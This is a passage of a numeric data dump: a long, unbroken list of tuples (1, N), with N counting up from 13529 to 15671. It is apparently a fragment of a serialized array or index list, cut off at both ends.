13529), (1, 13530), (1, 13531), (1, 13532), (1, 13533), (1, 13534), (1, 13535), (1, 13536), (1, 13537), (1, 13538), (1, 13539), (1, 13540), (1, 13541), (1, 13542), (1, 13543), (1, 13544), (1, 13545), (1, 13546), (1, 13547), (1, 13548), (1, 13549), (1, 13550), (1, 13551), (1, 13552), (1, 13553), (1, 13554), (1, 13555), (1, 13556), (1, 13557), (1, 13558), (1, 13559), (1, 13560), (1, 13561), (1, 13562), (1, 13563), (1, 13564), (1, 13565), (1, 13566), (1, 13567), (1, 13568), (1, 13569), (1, 13570), (1, 13571), (1, 13572), (1, 13573), (1, 13574), (1, 13575), (1, 13576), (1, 13577), (1, 13578), (1, 13579), (1, 13580), (1, 13581), (1, 13582), (1, 13583), (1, 13584), (1, 13585), (1, 13586), (1, 13587), (1, 13588), (1, 13589), (1, 13590), (1, 13591), (1, 13592), (1, 13593), (1, 13594), (1, 13595), (1, 13596), (1, 13597), (1, 13598), (1, 13599), (1, 13600), (1, 13601), (1, 13602), (1, 13603), (1, 13604), (1, 13605), (1, 13606), (1, 13607), (1, 13608), (1, 13609), (1, 13610), (1, 13611), (1, 13612), (1, 13613), (1, 13614), (1, 13615), (1, 13616), (1, 13617), (1, 13618), (1, 13619), (1, 13620), (1, 13621), (1, 13622), (1, 13623), (1, 13624), (1, 13625), (1, 13626), (1, 13627), (1, 13628), (1, 13629), (1, 13630), (1, 13631), (1, 13632), (1, 13633), (1, 13634), (1, 13635), (1, 13636), (1, 13637), (1, 13638), (1, 13639), (1, 13640), (1, 13641), (1, 13642), (1, 13643), (1, 13644), (1, 13645), (1, 13646), (1, 13647), (1, 13648), (1, 13649), (1, 13650), (1, 13651), (1, 13652), (1, 13653), (1, 13654), (1, 13655), (1, 13656), (1, 13657), (1, 13658), (1, 13659), (1, 13660), (1, 13661), (1, 13662), (1, 13663), (1, 13664), (1, 13665), (1, 13666), (1, 13667), (1, 13668), (1, 13669), (1, 13670), (1, 13671), (1, 13672), (1, 13673), (1, 13674), (1, 13675), (1, 13676), (1, 13677), (1, 13678), (1, 13679), (1, 13680), (1, 13681), (1, 13682), (1, 13683), (1, 13684), (1, 13685), (1, 13686), (1, 13687), (1, 13688), (1, 13689), (1, 13690), (1, 13691), (1, 13692), (1, 13693), (1, 13694), (1, 13695), (1, 13696), (1, 13697), (1, 13698), (1, 13699), (1, 13700), (1, 13701), (1, 13702), (1, 13703), (1, 13704), (1, 13705), (1, 13706), (1, 13707), (1, 13708), (1, 13709), (1, 13710), (1, 13711), (1, 13712), (1, 13713), (1, 13714), (1, 13715), (1, 13716), (1, 13717), (1, 13718), (1, 13719), (1, 13720), (1, 13721), (1, 13722), (1, 13723), (1, 13724), (1, 13725), (1, 13726), (1, 13727), (1, 13728), (1, 13729), (1, 13730), (1, 13731), (1, 13732), (1, 13733), (1, 13734), (1, 13735), (1, 13736), (1, 13737), (1, 13738), (1, 13739), (1, 13740), (1, 13741), (1, 13742), (1, 13743), (1, 13744), (1, 13745), (1, 13746), (1, 13747), (1, 13748), (1, 13749), (1, 13750), (1, 13751), (1, 13752), (1, 13753), (1, 13754), (1, 13755), (1, 13756), (1, 13757), (1, 13758), (1, 13759), (1, 13760), (1, 13761), (1, 13762), (1, 13763), (1, 13764), (1, 13765), (1, 13766), (1, 13767), (1, 13768), (1, 13769), (1, 13770), (1, 13771), (1, 13772), (1, 13773), (1, 13774), (1, 13775), (1, 13776), (1, 13777), (1, 13778), (1, 13779), (1, 13780), (1, 13781), (1, 13782), (1, 13783), (1, 13784), (1, 13785), (1, 13786), (1, 13787), (1, 13788), (1, 13789), (1, 13790), (1, 13791), (1, 13792), (1, 13793), (1, 13794), (1, 13795), (1, 13796), (1, 13797), (1, 13798), (1, 13799), (1, 13800), (1, 13801), (1, 13802), (1, 13803), (1, 13804), (1, 13805), (1, 13806), (1, 13807), (1, 13808), (1, 13809), (1, 13810), (1, 13811), (1, 13812), (1, 13813), (1, 13814), (1, 13815), (1, 13816), (1, 13817), (1, 13818), (1, 13819), (1, 13820), (1, 13821), (1, 13822), (1, 13823), (1, 13824), (1, 13825), (1, 13826), (1, 13827), (1, 13828), (1, 13829), (1, 13830), (1, 13831), (1, 13832), (1, 13833), (1, 13834), (1, 13835), (1, 13836), (1, 13837), (1, 13838), (1, 13839), (1, 13840), (1, 13841), (1, 13842), (1, 13843), (1, 13844), (1, 13845), (1, 13846), (1, 13847), (1, 13848), (1, 13849), (1, 13850), (1, 13851), (1, 13852), (1, 13853), (1, 13854), (1, 13855), (1, 13856), (1, 13857), (1, 13858), (1, 13859), (1, 13860), (1, 13861), (1, 13862), (1, 13863), (1, 13864), (1, 13865), (1, 13866), (1, 13867), (1, 13868), (1, 13869), (1, 13870), (1, 13871), (1, 13872), (1, 13873), (1, 13874), (1, 13875), (1, 13876), (1, 13877), (1, 13878), (1, 13879), (1, 13880), (1, 13881), (1, 13882), (1, 13883), (1, 13884), (1, 13885), (1, 13886), (1, 13887), (1, 13888), (1, 13889), (1, 13890), (1, 13891), (1, 13892), (1, 13893), (1, 13894), (1, 13895), (1, 13896), (1, 13897), (1, 13898), (1, 13899), (1, 13900), (1, 13901), (1, 13902), (1, 13903), (1, 13904), (1, 13905), (1, 13906), (1, 13907), (1, 13908), (1, 13909), (1, 13910), (1, 13911), (1, 13912), (1, 13913), (1, 13914), (1, 13915), (1, 13916), (1, 13917), (1, 13918), (1, 13919), (1, 13920), (1, 13921), (1, 13922), (1, 13923), (1, 13924), (1, 13925), (1, 13926), (1, 13927), (1, 13928), (1, 13929), (1, 13930), (1, 13931), (1, 13932), (1, 13933), (1, 13934), (1, 13935), (1, 13936), (1, 13937), (1, 13938), (1, 13939), (1, 13940), (1, 13941), (1, 13942), (1, 13943), (1, 13944), (1, 13945), (1, 13946), (1, 13947), (1, 13948), (1, 13949), (1, 13950), (1, 13951), (1, 13952), (1, 13953), (1, 13954), (1, 13955), (1, 13956), (1, 13957), (1, 13958), (1, 13959), (1, 13960), (1, 13961), (1, 13962), (1, 13963), (1, 13964), (1, 13965), (1, 13966), (1, 13967), (1, 13968), (1, 13969), (1, 13970), (1, 13971), (1, 13972), (1, 13973), (1, 13974), (1, 13975), (1, 13976), (1, 13977), (1, 13978), (1, 13979), (1, 13980), (1, 13981), (1, 13982), (1, 13983), (1, 13984), (1, 13985), (1, 13986), (1, 13987), (1, 13988), (1, 13989), (1, 13990), (1, 13991), (1, 13992), (1, 13993), (1, 13994), (1, 13995), (1, 13996), (1, 13997), (1, 13998), (1, 13999), (1, 14000), (1, 14001), (1, 14002), (1, 14003), (1, 14004), (1, 14005), (1, 14006), (1, 14007), (1, 14008), (1, 14009), (1, 14010), (1, 14011), (1, 14012), (1, 14013), (1, 14014), (1, 14015), (1, 14016), (1, 14017), (1, 14018), (1, 14019), (1, 14020), (1, 14021), (1, 14022), (1, 14023), (1, 14024), (1, 14025), (1, 14026), (1, 14027), (1, 14028), (1, 14029), (1, 14030), (1, 14031), (1, 14032), (1, 14033), (1, 14034), (1, 14035), (1, 14036), (1, 14037), (1, 14038), (1, 14039), (1, 14040), (1, 14041), (1, 14042), (1, 14043), (1, 14044), (1, 14045), (1, 14046), (1, 14047), (1, 14048), (1, 14049), (1, 14050), (1, 14051), (1, 14052), (1, 14053), (1, 14054), (1, 14055), (1, 14056), (1, 14057), (1, 14058), (1, 14059), (1, 14060), (1, 14061), (1, 14062), (1, 14063), (1, 14064), (1, 14065), (1, 14066), (1, 14067), (1, 14068), (1, 14069), (1, 14070), (1, 14071), (1, 14072), (1, 14073), (1, 14074), (1, 14075), (1, 14076), (1, 14077), (1, 14078), (1, 14079), (1, 14080), (1, 14081), (1, 14082), (1, 14083), (1, 14084), (1, 14085), (1, 14086), (1, 14087), (1, 14088), (1, 14089), (1, 14090), (1, 14091), (1, 14092), (1, 14093), (1, 14094), (1, 14095), (1, 14096), (1, 14097), (1, 14098), (1, 14099), (1, 14100), (1, 14101), (1, 14102), (1, 14103), (1, 14104), (1, 14105), (1, 14106), (1, 14107), (1, 14108), (1, 14109), (1, 14110), (1, 14111), (1, 14112), (1, 14113), (1, 14114), (1, 14115), (1, 14116), (1, 14117), (1, 14118), (1, 14119), (1, 14120), (1, 14121), (1, 14122), (1, 14123), (1, 14124), (1, 14125), (1, 14126), (1, 14127), (1, 14128), (1, 14129), (1, 14130), (1, 14131), (1, 14132), (1, 14133), (1, 14134), (1, 14135), (1, 14136), (1, 14137), (1, 14138), (1, 14139), (1, 14140), (1, 14141), (1, 14142), (1, 14143), (1, 14144), (1, 14145), (1, 14146), (1, 14147), (1, 14148), (1, 14149), (1, 14150), (1, 14151), (1, 14152), (1, 14153), (1, 14154), (1, 14155), (1, 14156), (1, 14157), (1, 14158), (1, 14159), (1, 14160), (1, 14161), (1, 14162), (1, 14163), (1, 14164), (1, 14165), (1, 14166), (1, 14167), (1, 14168), (1, 14169), (1, 14170), (1, 14171), (1, 14172), (1, 14173), (1, 14174), (1, 14175), (1, 14176), (1, 14177), (1, 14178), (1, 14179), (1, 14180), (1, 14181), (1, 14182), (1, 14183), (1, 14184), (1, 14185), (1, 14186), (1, 14187), (1, 14188), (1, 14189), (1, 14190), (1, 14191), (1, 14192), (1, 14193), (1, 14194), (1, 14195), (1, 14196), (1, 14197), (1, 14198), (1, 14199), (1, 14200), (1, 14201), (1, 14202), (1, 14203), (1, 14204), (1, 14205), (1, 14206), (1, 14207), (1, 14208), (1, 14209), (1, 14210), (1, 14211), (1, 14212), (1, 14213), (1, 14214), (1, 14215), (1, 14216), (1, 14217), (1, 14218), (1, 14219), (1, 14220), (1, 14221), (1, 14222), (1, 14223), (1, 14224), (1, 14225), (1, 14226), (1, 14227), (1, 14228), (1, 14229), (1, 14230), (1, 14231), (1, 14232), (1, 14233), (1, 14234), (1, 14235), (1, 14236), (1, 14237), (1, 14238), (1, 14239), (1, 14240), (1, 14241), (1, 14242), (1, 14243), (1, 14244), (1, 14245), (1, 14246), (1, 14247), (1, 14248), (1, 14249), (1, 14250), (1, 14251), (1, 14252), (1, 14253), (1, 14254), (1, 14255), (1, 14256), (1, 14257), (1, 14258), (1, 14259), (1, 14260), (1, 14261), (1, 14262), (1, 14263), (1, 14264), (1, 14265), (1, 14266), (1, 14267), (1, 14268), (1, 14269), (1, 14270), (1, 14271), (1, 14272), (1, 14273), (1, 14274), (1, 14275), (1, 14276), (1, 14277), (1, 14278), (1, 14279), (1, 14280), (1, 14281), (1, 14282), (1, 14283), (1, 14284), (1, 14285), (1, 14286), (1, 14287), (1, 14288), (1, 14289), (1, 14290), (1, 14291), (1, 14292), (1, 14293), (1, 14294), (1, 14295), (1, 14296), (1, 14297), (1, 14298), (1, 14299), (1, 14300), (1, 14301), (1, 14302), (1, 14303), (1, 14304), (1, 14305), (1, 14306), (1, 14307), (1, 14308), (1, 14309), (1, 14310), (1, 14311), (1, 14312), (1, 14313), (1, 14314), (1, 14315), (1, 14316), (1, 14317), (1, 14318), (1, 14319), (1, 14320), (1, 14321), (1, 14322), (1, 14323), (1, 14324), (1, 14325), (1, 14326), (1, 14327), (1, 14328), (1, 14329), (1, 14330), (1, 14331), (1, 14332), (1, 14333), (1, 14334), (1, 14335), (1, 14336), (1, 14337), (1, 14338), (1, 14339), (1, 14340), (1, 14341), (1, 14342), (1, 14343), (1, 14344), (1, 14345), (1, 14346), (1, 14347), (1, 14348), (1, 14349), (1, 14350), (1, 14351), (1, 14352), (1, 14353), (1, 14354), (1, 14355), (1, 14356), (1, 14357), (1, 14358), (1, 14359), (1, 14360), (1, 14361), (1, 14362), (1, 14363), (1, 14364), (1, 14365), (1, 14366), (1, 14367), (1, 14368), (1, 14369), (1, 14370), (1, 14371), (1, 14372), (1, 14373), (1, 14374), (1, 14375), (1, 14376), (1, 14377), (1, 14378), (1, 14379), (1, 14380), (1, 14381), (1, 14382), (1, 14383), (1, 14384), (1, 14385), (1, 14386), (1, 14387), (1, 14388), (1, 14389), (1, 14390), (1, 14391), (1, 14392), (1, 14393), (1, 14394), (1, 14395), (1, 14396), (1, 14397), (1, 14398), (1, 14399), (1, 14400), (1, 14401), (1, 14402), (1, 14403), (1, 14404), (1, 14405), (1, 14406), (1, 14407), (1, 14408), (1, 14409), (1, 14410), (1, 14411), (1, 14412), (1, 14413), (1, 14414), (1, 14415), (1, 14416), (1, 14417), (1, 14418), (1, 14419), (1, 14420), (1, 14421), (1, 14422), (1, 14423), (1, 14424), (1, 14425), (1, 14426), (1, 14427), (1, 14428), (1, 14429), (1, 14430), (1, 14431), (1, 14432), (1, 14433), (1, 14434), (1, 14435), (1, 14436), (1, 14437), (1, 14438), (1, 14439), (1, 14440), (1, 14441), (1, 14442), (1, 14443), (1, 14444), (1, 14445), (1, 14446), (1, 14447), (1, 14448), (1, 14449), (1, 14450), (1, 14451), (1, 14452), (1, 14453), (1, 14454), (1, 14455), (1, 14456), (1, 14457), (1, 14458), (1, 14459), (1, 14460), (1, 14461), (1, 14462), (1, 14463), (1, 14464), (1, 14465), (1, 14466), (1, 14467), (1, 14468), (1, 14469), (1, 14470), (1, 14471), (1, 14472), (1, 14473), (1, 14474), (1, 14475), (1, 14476), (1, 14477), (1, 14478), (1, 14479), (1, 14480), (1, 14481), (1, 14482), (1, 14483), (1, 14484), (1, 14485), (1, 14486), (1, 14487), (1, 14488), (1, 14489), (1, 14490), (1, 14491), (1, 14492), (1, 14493), (1, 14494), (1, 14495), (1, 14496), (1, 14497), (1, 14498), (1, 14499), (1, 14500), (1, 14501), (1, 14502), (1, 14503), (1, 14504), (1, 14505), (1, 14506), (1, 14507), (1, 14508), (1, 14509), (1, 14510), (1, 14511), (1, 14512), (1, 14513), (1, 14514), (1, 14515), (1, 14516), (1, 14517), (1, 14518), (1, 14519), (1, 14520), (1, 14521), (1, 14522), (1, 14523), (1, 14524), (1, 14525), (1, 14526), (1, 14527), (1, 14528), (1, 14529), (1, 14530), (1, 14531), (1, 14532), (1, 14533), (1, 14534), (1, 14535), (1, 14536), (1, 14537), (1, 14538), (1, 14539), (1, 14540), (1, 14541), (1, 14542), (1, 14543), (1, 14544), (1, 14545), (1, 14546), (1, 14547), (1, 14548), (1, 14549), (1, 14550), (1, 14551), (1, 14552), (1, 14553), (1, 14554), (1, 14555), (1, 14556), (1, 14557), (1, 14558), (1, 14559), (1, 14560), (1, 14561), (1, 14562), (1, 14563), (1, 14564), (1, 14565), (1, 14566), (1, 14567), (1, 14568), (1, 14569), (1, 14570), (1, 14571), (1, 14572), (1, 14573), (1, 14574), (1, 14575), (1, 14576), (1, 14577), (1, 14578), (1, 14579), (1, 14580), (1, 14581), (1, 14582), (1, 14583), (1, 14584), (1, 14585), (1, 14586), (1, 14587), (1, 14588), (1, 14589), (1, 14590), (1, 14591), (1, 14592), (1, 14593), (1, 14594), (1, 14595), (1, 14596), (1, 14597), (1, 14598), (1, 14599), (1, 14600), (1, 14601), (1, 14602), (1, 14603), (1, 14604), (1, 14605), (1, 14606), (1, 14607), (1, 14608), (1, 14609), (1, 14610), (1, 14611), (1, 14612), (1, 14613), (1, 14614), (1, 14615), (1, 14616), (1, 14617), (1, 14618), (1, 14619), (1, 14620), (1, 14621), (1, 14622), (1, 14623), (1, 14624), (1, 14625), (1, 14626), (1, 14627), (1, 14628), (1, 14629), (1, 14630), (1, 14631), (1, 14632), (1, 14633), (1, 14634), (1, 14635), (1, 14636), (1, 14637), (1, 14638), (1, 14639), (1, 14640), (1, 14641), (1, 14642), (1, 14643), (1, 14644), (1, 14645), (1, 14646), (1, 14647), (1, 14648), (1, 14649), (1, 14650), (1, 14651), (1, 14652), (1, 14653), (1, 14654), (1, 14655), (1, 14656), (1, 14657), (1, 14658), (1, 14659), (1, 14660), (1, 14661), (1, 14662), (1, 14663), (1, 14664), (1, 14665), (1, 14666), (1, 14667), (1, 14668), (1, 14669), (1, 14670), (1, 14671), (1, 14672), (1, 14673), (1, 14674), (1, 14675), (1, 14676), (1, 14677), (1, 14678), (1, 14679), (1, 14680), (1, 14681), (1, 14682), (1, 14683), (1, 14684), (1, 14685), (1, 14686), (1, 14687), (1, 14688), (1, 14689), (1, 14690), (1, 14691), (1, 14692), (1, 14693), (1, 14694), (1, 14695), (1, 14696), (1, 14697), (1, 14698), (1, 14699), (1, 14700), (1, 14701), (1, 14702), (1, 14703), (1, 14704), (1, 14705), (1, 14706), (1, 14707), (1, 14708), (1, 14709), (1, 14710), (1, 14711), (1, 14712), (1, 14713), (1, 14714), (1, 14715), (1, 14716), (1, 14717), (1, 14718), (1, 14719), (1, 14720), (1, 14721), (1, 14722), (1, 14723), (1, 14724), (1, 14725), (1, 14726), (1, 14727), (1, 14728), (1, 14729), (1, 14730), (1, 14731), (1, 14732), (1, 14733), (1, 14734), (1, 14735), (1, 14736), (1, 14737), (1, 14738), (1, 14739), (1, 14740), (1, 14741), (1, 14742), (1, 14743), (1, 14744), (1, 14745), (1, 14746), (1, 14747), (1, 14748), (1, 14749), (1, 14750), (1, 14751), (1, 14752), (1, 14753), (1, 14754), (1, 14755), (1, 14756), (1, 14757), (1, 14758), (1, 14759), (1, 14760), (1, 14761), (1, 14762), (1, 14763), (1, 14764), (1, 14765), (1, 14766), (1, 14767), (1, 14768), (1, 14769), (1, 14770), (1, 14771), (1, 14772), (1, 14773), (1, 14774), (1, 14775), (1, 14776), (1, 14777), (1, 14778), (1, 14779), (1, 14780), (1, 14781), (1, 14782), (1, 14783), (1, 14784), (1, 14785), (1, 14786), (1, 14787), (1, 14788), (1, 14789), (1, 14790), (1, 14791), (1, 14792), (1, 14793), (1, 14794), (1, 14795), (1, 14796), (1, 14797), (1, 14798), (1, 14799), (1, 14800), (1, 14801), (1, 14802), (1, 14803), (1, 14804), (1, 14805), (1, 14806), (1, 14807), (1, 14808), (1, 14809), (1, 14810), (1, 14811), (1, 14812), (1, 14813), (1, 14814), (1, 14815), (1, 14816), (1, 14817), (1, 14818), (1, 14819), (1, 14820), (1, 14821), (1, 14822), (1, 14823), (1, 14824), (1, 14825), (1, 14826), (1, 14827), (1, 14828), (1, 14829), (1, 14830), (1, 14831), (1, 14832), (1, 14833), (1, 14834), (1, 14835), (1, 14836), (1, 14837), (1, 14838), (1, 14839), (1, 14840), (1, 14841), (1, 14842), (1, 14843), (1, 14844), (1, 14845), (1, 14846), (1, 14847), (1, 14848), (1, 14849), (1, 14850), (1, 14851), (1, 14852), (1, 14853), (1, 14854), (1, 14855), (1, 14856), (1, 14857), (1, 14858), (1, 14859), (1, 14860), (1, 14861), (1, 14862), (1, 14863), (1, 14864), (1, 14865), (1, 14866), (1, 14867), (1, 14868), (1, 14869), (1, 14870), (1, 14871), (1, 14872), (1, 14873), (1, 14874), (1, 14875), (1, 14876), (1, 14877), (1, 14878), (1, 14879), (1, 14880), (1, 14881), (1, 14882), (1, 14883), (1, 14884), (1, 14885), (1, 14886), (1, 14887), (1, 14888), (1, 14889), (1, 14890), (1, 14891), (1, 14892), (1, 14893), (1, 14894), (1, 14895), (1, 14896), (1, 14897), (1, 14898), (1, 14899), (1, 14900), (1, 14901), (1, 14902), (1, 14903), (1, 14904), (1, 14905), (1, 14906), (1, 14907), (1, 14908), (1, 14909), (1, 14910), (1, 14911), (1, 14912), (1, 14913), (1, 14914), (1, 14915), (1, 14916), (1, 14917), (1, 14918), (1, 14919), (1, 14920), (1, 14921), (1, 14922), (1, 14923), (1, 14924), (1, 14925), (1, 14926), (1, 14927), (1, 14928), (1, 14929), (1, 14930), (1, 14931), (1, 14932), (1, 14933), (1, 14934), (1, 14935), (1, 14936), (1, 14937), (1, 14938), (1, 14939), (1, 14940), (1, 14941), (1, 14942), (1, 14943), (1, 14944), (1, 14945), (1, 14946), (1, 14947), (1, 14948), (1, 14949), (1, 14950), (1, 14951), (1, 14952), (1, 14953), (1, 14954), (1, 14955), (1, 14956), (1, 14957), (1, 14958), (1, 14959), (1, 14960), (1, 14961), (1, 14962), (1, 14963), (1, 14964), (1, 14965), (1, 14966), (1, 14967), (1, 14968), (1, 14969), (1, 14970), (1, 14971), (1, 14972), (1, 14973), (1, 14974), (1, 14975), (1, 14976), (1, 14977), (1, 14978), (1, 14979), (1, 14980), (1, 14981), (1, 14982), (1, 14983), (1, 14984), (1, 14985), (1, 14986), (1, 14987), (1, 14988), (1, 14989), (1, 14990), (1, 14991), (1, 14992), (1, 14993), (1, 14994), (1, 14995), (1, 14996), (1, 14997), (1, 14998), (1, 14999), (1, 15000), (1, 15001), (1, 15002), (1, 15003), (1, 15004), (1, 15005), (1, 15006), (1, 15007), (1, 15008), (1, 15009), (1, 15010), (1, 15011), (1, 15012), (1, 15013), (1, 15014), (1, 15015), (1, 15016), (1, 15017), (1, 15018), (1, 15019), (1, 15020), (1, 15021), (1, 15022), (1, 15023), (1, 15024), (1, 15025), (1, 15026), (1, 15027), (1, 15028), (1, 15029), (1, 15030), (1, 15031), (1, 15032), (1, 15033), (1, 15034), (1, 15035), (1, 15036), (1, 15037), (1, 15038), (1, 15039), (1, 15040), (1, 15041), (1, 15042), (1, 15043), (1, 15044), (1, 15045), (1, 15046), (1, 15047), (1, 15048), (1, 15049), (1, 15050), (1, 15051), (1, 15052), (1, 15053), (1, 15054), (1, 15055), (1, 15056), (1, 15057), (1, 15058), (1, 15059), (1, 15060), (1, 15061), (1, 15062), (1, 15063), (1, 15064), (1, 15065), (1, 15066), (1, 15067), (1, 15068), (1, 15069), (1, 15070), (1, 15071), (1, 15072), (1, 15073), (1, 15074), (1, 15075), (1, 15076), (1, 15077), (1, 15078), (1, 15079), (1, 15080), (1, 15081), (1, 15082), (1, 15083), (1, 15084), (1, 15085), (1, 15086), (1, 15087), (1, 15088), (1, 15089), (1, 15090), (1, 15091), (1, 15092), (1, 15093), (1, 15094), (1, 15095), (1, 15096), (1, 15097), (1, 15098), (1, 15099), (1, 15100), (1, 15101), (1, 15102), (1, 15103), (1, 15104), (1, 15105), (1, 15106), (1, 15107), (1, 15108), (1, 15109), (1, 15110), (1, 15111), (1, 15112), (1, 15113), (1, 15114), (1, 15115), (1, 15116), (1, 15117), (1, 15118), (1, 15119), (1, 15120), (1, 15121), (1, 15122), (1, 15123), (1, 15124), (1, 15125), (1, 15126), (1, 15127), (1, 15128), (1, 15129), (1, 15130), (1, 15131), (1, 15132), (1, 15133), (1, 15134), (1, 15135), (1, 15136), (1, 15137), (1, 15138), (1, 15139), (1, 15140), (1, 15141), (1, 15142), (1, 15143), (1, 15144), (1, 15145), (1, 15146), (1, 15147), (1, 15148), (1, 15149), (1, 15150), (1, 15151), (1, 15152), (1, 15153), (1, 15154), (1, 15155), (1, 15156), (1, 15157), (1, 15158), (1, 15159), (1, 15160), (1, 15161), (1, 15162), (1, 15163), (1, 15164), (1, 15165), (1, 15166), (1, 15167), (1, 15168), (1, 15169), (1, 15170), (1, 15171), (1, 15172), (1, 15173), (1, 15174), (1, 15175), (1, 15176), (1, 15177), (1, 15178), (1, 15179), (1, 15180), (1, 15181), (1, 15182), (1, 15183), (1, 15184), (1, 15185), (1, 15186), (1, 15187), (1, 15188), (1, 15189), (1, 15190), (1, 15191), (1, 15192), (1, 15193), (1, 15194), (1, 15195), (1, 15196), (1, 15197), (1, 15198), (1, 15199), (1, 15200), (1, 15201), (1, 15202), (1, 15203), (1, 15204), (1, 15205), (1, 15206), (1, 15207), (1, 15208), (1, 15209), (1, 15210), (1, 15211), (1, 15212), (1, 15213), (1, 15214), (1, 15215), (1, 15216), (1, 15217), (1, 15218), (1, 15219), (1, 15220), (1, 15221), (1, 15222), (1, 15223), (1, 15224), (1, 15225), (1, 15226), (1, 15227), (1, 15228), (1, 15229), (1, 15230), (1, 15231), (1, 15232), (1, 15233), (1, 15234), (1, 15235), (1, 15236), (1, 15237), (1, 15238), (1, 15239), (1, 15240), (1, 15241), (1, 15242), (1, 15243), (1, 15244), (1, 15245), (1, 15246), (1, 15247), (1, 15248), (1, 15249), (1, 15250), (1, 15251), (1, 15252), (1, 15253), (1, 15254), (1, 15255), (1, 15256), (1, 15257), (1, 15258), (1, 15259), (1, 15260), (1, 15261), (1, 15262), (1, 15263), (1, 15264), (1, 15265), (1, 15266), (1, 15267), (1, 15268), (1, 15269), (1, 15270), (1, 15271), (1, 15272), (1, 15273), (1, 15274), (1, 15275), (1, 15276), (1, 15277), (1, 15278), (1, 15279), (1, 15280), (1, 15281), (1, 15282), (1, 15283), (1, 15284), (1, 15285), (1, 15286), (1, 15287), (1, 15288), (1, 15289), (1, 15290), (1, 15291), (1, 15292), (1, 15293), (1, 15294), (1, 15295), (1, 15296), (1, 15297), (1, 15298), (1, 15299), (1, 15300), (1, 15301), (1, 15302), (1, 15303), (1, 15304), (1, 15305), (1, 15306), (1, 15307), (1, 15308), (1, 15309), (1, 15310), (1, 15311), (1, 15312), (1, 15313), (1, 15314), (1, 15315), (1, 15316), (1, 15317), (1, 15318), (1, 15319), (1, 15320), (1, 15321), (1, 15322), (1, 15323), (1, 15324), (1, 15325), (1, 15326), (1, 15327), (1, 15328), (1, 15329), (1, 15330), (1, 15331), (1, 15332), (1, 15333), (1, 15334), (1, 15335), (1, 15336), (1, 15337), (1, 15338), (1, 15339), (1, 15340), (1, 15341), (1, 15342), (1, 15343), (1, 15344), (1, 15345), (1, 15346), (1, 15347), (1, 15348), (1, 15349), (1, 15350), (1, 15351), (1, 15352), (1, 15353), (1, 15354), (1, 15355), (1, 15356), (1, 15357), (1, 15358), (1, 15359), (1, 15360), (1, 15361), (1, 15362), (1, 15363), (1, 15364), (1, 15365), (1, 15366), (1, 15367), (1, 15368), (1, 15369), (1, 15370), (1, 15371), (1, 15372), (1, 15373), (1, 15374), (1, 15375), (1, 15376), (1, 15377), (1, 15378), (1, 15379), (1, 15380), (1, 15381), (1, 15382), (1, 15383), (1, 15384), (1, 15385), (1, 15386), (1, 15387), (1, 15388), (1, 15389), (1, 15390), (1, 15391), (1, 15392), (1, 15393), (1, 15394), (1, 15395), (1, 15396), (1, 15397), (1, 15398), (1, 15399), (1, 15400), (1, 15401), (1, 15402), (1, 15403), (1, 15404), (1, 15405), (1, 15406), (1, 15407), (1, 15408), (1, 15409), (1, 15410), (1, 15411), (1, 15412), (1, 15413), (1, 15414), (1, 15415), (1, 15416), (1, 15417), (1, 15418), (1, 15419), (1, 15420), (1, 15421), (1, 15422), (1, 15423), (1, 15424), (1, 15425), (1, 15426), (1, 15427), (1, 15428), (1, 15429), (1, 15430), (1, 15431), (1, 15432), (1, 15433), (1, 15434), (1, 15435), (1, 15436), (1, 15437), (1, 15438), (1, 15439), (1, 15440), (1, 15441), (1, 15442), (1, 15443), (1, 15444), (1, 15445), (1, 15446), (1, 15447), (1, 15448), (1, 15449), (1, 15450), (1, 15451), (1, 15452), (1, 15453), (1, 15454), (1, 15455), (1, 15456), (1, 15457), (1, 15458), (1, 15459), (1, 15460), (1, 15461), (1, 15462), (1, 15463), (1, 15464), (1, 15465), (1, 15466), (1, 15467), (1, 15468), (1, 15469), (1, 15470), (1, 15471), (1, 15472), (1, 15473), (1, 15474), (1, 15475), (1, 15476), (1, 15477), (1, 15478), (1, 15479), (1, 15480), (1, 15481), (1, 15482), (1, 15483), (1, 15484), (1, 15485), (1, 15486), (1, 15487), (1, 15488), (1, 15489), (1, 15490), (1, 15491), (1, 15492), (1, 15493), (1, 15494), (1, 15495), (1, 15496), (1, 15497), (1, 15498), (1, 15499), (1, 15500), (1, 15501), (1, 15502), (1, 15503), (1, 15504), (1, 15505), (1, 15506), (1, 15507), (1, 15508), (1, 15509), (1, 15510), (1, 15511), (1, 15512), (1, 15513), (1, 15514), (1, 15515), (1, 15516), (1, 15517), (1, 15518), (1, 15519), (1, 15520), (1, 15521), (1, 15522), (1, 15523), (1, 15524), (1, 15525), (1, 15526), (1, 15527), (1, 15528), (1, 15529), (1, 15530), (1, 15531), (1, 15532), (1, 15533), (1, 15534), (1, 15535), (1, 15536), (1, 15537), (1, 15538), (1, 15539), (1, 15540), (1, 15541), (1, 15542), (1, 15543), (1, 15544), (1, 15545), (1, 15546), (1, 15547), (1, 15548), (1, 15549), (1, 15550), (1, 15551), (1, 15552), (1, 15553), (1, 15554), (1, 15555), (1, 15556), (1, 15557), (1, 15558), (1, 15559), (1, 15560), (1, 15561), (1, 15562), (1, 15563), (1, 15564), (1, 15565), (1, 15566), (1, 15567), (1, 15568), (1, 15569), (1, 15570), (1, 15571), (1, 15572), (1, 15573), (1, 15574), (1, 15575), (1, 15576), (1, 15577), (1, 15578), (1, 15579), (1, 15580), (1, 15581), (1, 15582), (1, 15583), (1, 15584), (1, 15585), (1, 15586), (1, 15587), (1, 15588), (1, 15589), (1, 15590), (1, 15591), (1, 15592), (1, 15593), (1, 15594), (1, 15595), (1, 15596), (1, 15597), (1, 15598), (1, 15599), (1, 15600), (1, 15601), (1, 15602), (1, 15603), (1, 15604), (1, 15605), (1, 15606), (1, 15607), (1, 15608), (1, 15609), (1, 15610), (1, 15611), (1, 15612), (1, 15613), (1, 15614), (1, 15615), (1, 15616), (1, 15617), (1, 15618), (1, 15619), (1, 15620), (1, 15621), (1, 15622), (1, 15623), (1, 15624), (1, 15625), (1, 15626), (1, 15627), (1, 15628), (1, 15629), (1, 15630), (1, 15631), (1, 15632), (1, 15633), (1, 15634), (1, 15635), (1, 15636), (1, 15637), (1, 15638), (1, 15639), (1, 15640), (1, 15641), (1, 15642), (1, 15643), (1, 15644), (1, 15645), (1, 15646), (1, 15647), (1, 15648), (1, 15649), (1, 15650), (1, 15651), (1, 15652), (1, 15653), (1, 15654), (1, 15655), (1, 15656), (1, 15657), (1, 15658), (1, 15659), (1, 15660), (1, 15661), (1, 15662), (1, 15663), (1, 15664), (1, 15665), (1, 15666), (1, 15667), (1, 15668), (1, 15669), (1, 15670), (1, 15671), 